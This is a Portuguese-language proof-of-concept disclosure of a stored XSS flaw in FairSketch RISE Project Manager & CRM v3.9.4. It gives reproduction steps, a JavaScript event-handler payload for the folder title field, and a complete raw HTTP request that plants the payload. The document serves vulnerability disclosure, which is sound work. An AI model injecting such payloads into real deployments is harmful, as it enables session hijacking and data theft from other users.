
Prova de conceito para uma vulnerabilidade de XSS armazenado no FairSketch RISE Ultimate Project Manager & CRM v3.9.4, demonstrando a execução arbitrária de JavaScript por meio de injeção no título da pasta.
Uma vulnerabilidade de Cross Site Scripting (XSS) Armazenado foi descoberta no FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) na funcionalidade do Gerenciador de Arquivos. A vulnerabilidade está no parâmetro de título que é enviado ao criar novas pastas. Devido à sanitização insuficiente de entrada, um atacante pode injetar payloads HTML/JavaScript (ex.: <details/open/ontoggle=prompt(origin)>). O payload é armazenado no nome da pasta e executado ao listar pastas no Gerenciador de Arquivos, permitindo a execução arbitrária de JavaScript no navegador de qualquer usuário que visualize a pasta afetada. Isso pode resultar em sequestro de sessão e exfiltração de dados.
[!NOTE]
Esta vulnerabilidade não é exclusiva de contas de administrador. Ela pode ser explorada usando qualquer conta de usuário que tenha permissão para criar novas pastas no Gerenciador de Arquivos.
Faça login com credenciais válidas.
Navegue até Arquivos

Clique em Nova Pasta

Insira o payload abaixo no campo Título e digite:
<details/open/ontoggle=prompt(origin)>


POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E